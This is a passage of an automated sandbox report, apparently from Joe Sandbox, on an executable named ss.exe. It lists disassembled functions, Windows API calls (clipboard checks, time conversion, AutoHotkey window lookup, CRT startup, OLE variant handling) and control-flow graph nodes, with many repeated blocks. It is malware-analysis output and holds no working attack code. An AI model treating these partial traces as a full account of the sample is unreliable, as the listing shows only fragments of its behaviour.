    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    • CharUpperA.USER32(004ABB26), ref: 0042594D
      • Part of subcall function 00412850: IsCharAlphaA.USER32(?), ref: 00412879
      • Part of subcall function 00412850: CharUpperA.USER32 ref: 00412887
      • Part of subcall function 00412850: CharLowerA.USER32 ref: 00412893
    • CharLowerA.USER32(004ABB26), ref: 00425937
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    • IsWindow.USER32(00000000), ref: 0042767B
    • DestroyWindow.USER32(00000000), ref: 0042768C
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 7319 487b7d-487b9b call 489be0 GetStartupInfoW 7322 487b9d-487ba2 HeapSetInformation 7319->7322 7323 487ba8-487bb4 7319->7323 7322->7323 7324 487bbb-487bca 7323->7324 7325 487bb6-487bb9 7323->7325 7324->7325 7327 487bcc-487bd8 7324->7327 7326 487bf1-487bf8 call 489251 7325->7326 7332 487bfa-487c01 call 487b54 7326->7332 7333 487c02-487c09 call 488b6b 7326->7333 7327->7325 7329 487bda-487be1 7327->7329 7329->7325 7330 487be3-487bee 7329->7330 7330->7326 7332->7333 7338 487c0b-487c12 call 487b54 7333->7338 7339 487c13-487c22 call 489a12 call 48aea1 7333->7339 7338->7339 7346 487c2c-487c48 GetCommandLineA call 48db3a call 48da7f 7339->7346 7347 487c24-487c2b __amsg_exit 7339->7347 7352 487c4a-487c51 __amsg_exit 7346->7352 7353 487c52-487c59 call 48d809 7346->7353 7347->7346 7352->7353 7356 487c5b-487c62 __amsg_exit 7353->7356 7357 487c63-487c6d call 484a99 7353->7357 7356->7357 7360 487c6f-487c75 __amsg_exit 7357->7360 7361 487c76-487c7f call 48d7aa 7357->7361 7360->7361 7364 487c81-487c85 7361->7364 7365 487c87-487c89 7361->7365 7366 487c8a-487c9d call 403af0 7364->7366 7365->7366 7369 487ca5-487ce9 call 484c9c call 489c25 7366->7369 7370 487c9f-487ca0 call 484c70 7366->7370 7370->7369
    APIs
    • GetStartupInfoW.KERNEL32(?,004A16E8,00000058), ref: 00487B8D
    • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000), ref: 00487BA2
      • Part of subcall function 00489251: HeapCreate.KERNELBASE(00000000,00001000,00000000,00487BF6), ref: 0048925A
      • Part of subcall function 00488B6B: GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00487C07), ref: 00488B73
      • Part of subcall function 00488B6B: GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,00487C07), ref: 00488B95
      • Part of subcall function 00488B6B: GetProcAddress.KERNEL32(00000000,FlsGetValue,?,00487C07), ref: 00488BA2
      • Part of subcall function 00488B6B: GetProcAddress.KERNEL32(00000000,FlsSetValue,?,00487C07), ref: 00488BAF
      • Part of subcall function 00488B6B: GetProcAddress.KERNEL32(00000000,FlsFree,?,00487C07), ref: 00488BBC
      • Part of subcall function 00488B6B: TlsAlloc.KERNEL32(?,00487C07), ref: 00488C0C
      • Part of subcall function 00488B6B: TlsSetValue.KERNEL32(00000000,?,00487C07), ref: 00488C27
      • Part of subcall function 00488B6B: GetCurrentThreadId.KERNEL32(?,00487C07), ref: 00488CCB
    • __RTC_Initialize.LIBCMT ref: 00487C13
      • Part of subcall function 0048AEA1: GetStartupInfoW.KERNEL32(?), ref: 0048AEAE
      • Part of subcall function 0048AEA1: GetFileType.KERNEL32(?), ref: 0048AFE1
      • Part of subcall function 0048AEA1: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0), ref: 0048B017
      • Part of subcall function 0048AEA1: GetStdHandle.KERNEL32(-000000F6), ref: 0048B06B
      • Part of subcall function 0048AEA1: GetFileType.KERNEL32(00000000), ref: 0048B07D
      • Part of subcall function 0048AEA1: InitializeCriticalSectionAndSpinCount.KERNEL32(-004AD594,00000FA0), ref: 0048B0AB
      • Part of subcall function 0048AEA1: SetHandleCount.KERNEL32 ref: 0048B0D4
    • __amsg_exit.LIBCMT ref: 00487C26
    • GetCommandLineA.KERNEL32 ref: 00487C2C
      • Part of subcall function 0048DB3A: GetEnvironmentStringsW.KERNEL32 ref: 0048DB44
      • Part of subcall function 0048DB3A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0048DB82
      • Part of subcall function 0048DB3A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0048DBA5
      • Part of subcall function 0048DB3A: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0048DBB8
      • Part of subcall function 0048DB3A: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0048DBC4
      • Part of subcall function 0048DA7F: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\ss.exe,00000104), ref: 0048DAAB
      • Part of subcall function 0048DA7F: _parse_cmdline.LIBCMT ref: 0048DAD6
      • Part of subcall function 0048DA7F: _parse_cmdline.LIBCMT ref: 0048DB17
    • __amsg_exit.LIBCMT ref: 00487C4C
      • Part of subcall function 0048D809: _strlen.LIBCMT ref: 0048D833
      • Part of subcall function 0048D809: _strlen.LIBCMT ref: 0048D864
    • __amsg_exit.LIBCMT ref: 00487C5D
      • Part of subcall function 00484A99: __initterm_e.LIBCMT ref: 00484ACF
    • __amsg_exit.LIBCMT ref: 00487C70
      • Part of subcall function 00403AF0: RtlInitializeCriticalSection.NTDLL(004A90F0), ref: 00403B09
      • Part of subcall function 00403AF0: SetErrorMode.KERNELBASE(00000001), ref: 00403B11
      • Part of subcall function 00403AF0: GetCurrentDirectoryA.KERNEL32(00000104,C:\Users\user\Desktop), ref: 00403B21
      • Part of subcall function 00403AF0: FindWindowA.USER32(AutoHotkey,001B277C), ref: 00403E58
      • Part of subcall function 00403AF0: FindWindowA.USER32(AutoHotkey,001B277C), ref: 00403EBE
      • Part of subcall function 00403AF0: PostMessageA.USER32(00000000,00000044,00000406,00000000), ref: 00403ED5
      • Part of subcall function 00403AF0: Sleep.KERNEL32(00000014), ref: 00403EE5
      • Part of subcall function 00403AF0: IsWindow.USER32(00000000), ref: 00403EE8
      • Part of subcall function 00403AF0: Sleep.KERNEL32(00000014), ref: 00403F20
      • Part of subcall function 00403AF0: IsWindow.USER32(00000000), ref: 00403F23
      • Part of subcall function 00403AF0: Sleep.KERNEL32(00000064), ref: 00403F2F
      • Part of subcall function 00403AF0: SystemParametersInfoA.USER32(00002000,00000000,004A8DE4,00000000), ref: 00403F45
      • Part of subcall function 00403AF0: SystemParametersInfoA.USER32(00002001,00000000,00000000,00000002), ref: 00403F5F
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 7377 455180-4551b8 7378 455244 7377->7378 7379 4551be-4551cd 7377->7379 7382 455246-45524d 7378->7382 7380 45521b-45521d 7379->7380 7381 4551cf-4551d9 7379->7381 7385 455225-45522e 7380->7385 7383 4551db-4551f2 call 454b90 7381->7383 7384 455206-455216 call 454c70 7381->7384 7386 455596-45559b 7382->7386 7387 455253-455256 7382->7387 7406 4551f4-455201 call 454cd0 7383->7406 7407 45521f-455222 7383->7407 7405 4555d2 7384->7405 7392 455230-455232 7385->7392 7393 455234-45523f 7385->7393 7388 45559d-4555b1 call 4555f0 7386->7388 7389 4555b3-4555c0 7386->7389 7387->7386 7390 45525c-455263 7387->7390 7409 4555d7-4555ed 7388->7409 7399 4555c3-4555cf call 454d50 7389->7399 7395 455278-45527a 7390->7395 7396 455265-455273 7390->7396 7392->7382 7392->7393 7393->7399 7402 455280-455289 7395->7402 7403 455378-45537b 7395->7403 7404 455382 7396->7404 7399->7405 7410 455375 7402->7410 7411 45528f-4552b4 call 44d830 call 44eb00 7402->7411 7403->7404 7412 455385-4553c5 7404->7412 7405->7409 7406->7405 7407->7385 7410->7403 7436 4552b6-4552bd 7411->7436 7437 4552bf 7411->7437 7416 4553c7-4553cb 7412->7416 7417 45542b 7412->7417 7416->7417 7420 4553cd-4553e1 call 48e1d0 7416->7420 7419 45542e-455431 7417->7419 7422 455437-45543a 7419->7422 7423 4554d8-4554dd 7419->7423 7438 4553e3-4553e9 7420->7438 7439 45540d-455419 7420->7439 7426 455467-45546b 7422->7426 7427 45543c-455440 7422->7427 7428 4554df-4554e5 7423->7428 7429 45550a-45550d 7423->7429 7440 4554a3-4554d0 7426->7440 7441 45546d-455470 7426->7441 7427->7426 7435 455442-455465 7427->7435 7434 4554e7-4554eb 7428->7434 7432 455531-455534 7429->7432 7433 45550f-45552c call 454d50 7429->7433 7449 455536-45555f 7432->7449 7450 455578-455586 call 454470 7432->7450 7433->7405 7442 4554ff-455506 7434->7442 7443 4554ed-4554f3 7434->7443 7435->7423 7435->7426 7436->7437 7445 4552c6-4552e0 7436->7445 7437->7445 7444 4553ec-455403 call 454940 7438->7444 7439->7419 7448 45541b-455429 7439->7448 7458 4554d5 7440->7458 7441->7440 7446 455472-4554a1 7441->7446 7442->7434 7451 455508 7442->7451 7443->7442 7454 4554f5-4554f9 SysFreeString 7443->7454 7467 455405-45540b 7444->7467 7461 4552e5-4552ed 7445->7461 7446->7423 7446->7440 7448->7419 7455 455561-455576 7449->7455 7456 455589-455594 7449->7456 7450->7456 7451->7429 7454->7442 7455->7405 7456->7405 7458->7423 7465 4552ef-4552f2 7461->7465 7466 455341-455343 7461->7466 7470 4552f4-455309 7465->7470 7471 45535c-455360 7465->7471 7468 455348-45535a call 44e850 7466->7468 7469 455345 7466->7469 7467->7439 7468->7412 7469->7468 7470->7469 7477 45530b-45533e SysAllocString SysFreeString 7470->7477 7471->7469 7473 455362-45536b call 44d610 7471->7473 7473->7469 7479 45536d-455373 7473->7479 7477->7466 7479->7468
    APIs
      • Part of subcall function 00454C70: VariantCopyInd.OLEAUT32(?,?), ref: 00454C9B
      • Part of subcall function 00454B90: VariantClear.OLEAUT32 ref: 00454BA1
      • Part of subcall function 00454B90: VariantChangeType.OLEAUT32(?,?,00000000), ref: 00454C00
      • Part of subcall function 00454B90: VariantClear.OLEAUT32(?), ref: 00454C11
      • Part of subcall function 00454B90: SysFreeString.OLEAUT32 ref: 00454C33
    • SysAllocString.OLEAUT32(|I), ref: 0045530F
    • SysFreeString.OLEAUT32(00000000), ref: 0045532D
    • SysFreeString.OLEAUT32(00000006), ref: 004554F9
      • Part of subcall function 00454470: SysStringLen.OLEAUT32(?), ref: 004544BE
      • Part of subcall function 00454470: VariantChangeType.OLEAUT32(?,?,00000000,00000008), ref: 004547AE
      • Part of subcall function 00454470: VariantClear.OLEAUT32(?), ref: 0045484C
      • Part of subcall function 00454940: SysAllocString.OLEAUT32(0049E27C), ref: 00454A2E
      • Part of subcall function 00454940: SafeArrayCopy.OLEAUT32(00000000,00000000), ref: 00454AE0
      • Part of subcall function 00454D50: FormatMessageA.KERNEL32(00001200,00000000,?,00000000,?,00001000,00000000), ref: 00454DD1
      • Part of subcall function 00454D50: _vswprintf_s.LIBCMT ref: 00454E02
      • Part of subcall function 00454D50: SysFreeString.OLEAUT32(?), ref: 00454E32
      • Part of subcall function 00454D50: SysFreeString.OLEAUT32(00000000), ref: 00454E38
      • Part of subcall function 00454D50: SysFreeString.OLEAUT32(?), ref: 00454E3E
      • Part of subcall function 004555F0: SafeArrayCopy.OLEAUT32(?,?), ref: 004556E9
      • Part of subcall function 004555F0: SafeArrayDestroy.OLEAUT32(?), ref: 00455744
      • Part of subcall function 004555F0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0045577F
      • Part of subcall function 004555F0: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 00455802
      • Part of subcall function 004555F0: SafeArrayGetDim.OLEAUT32(?), ref: 00455815
      • Part of subcall function 004555F0: SafeArrayLock.OLEAUT32(?), ref: 004558B8
      • Part of subcall function 004555F0: SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004558C9
      • Part of subcall function 004555F0: SafeArrayUnaccessData.OLEAUT32(?), ref: 00455939
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    • __alldiv.INT64 ref: 004255BE
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
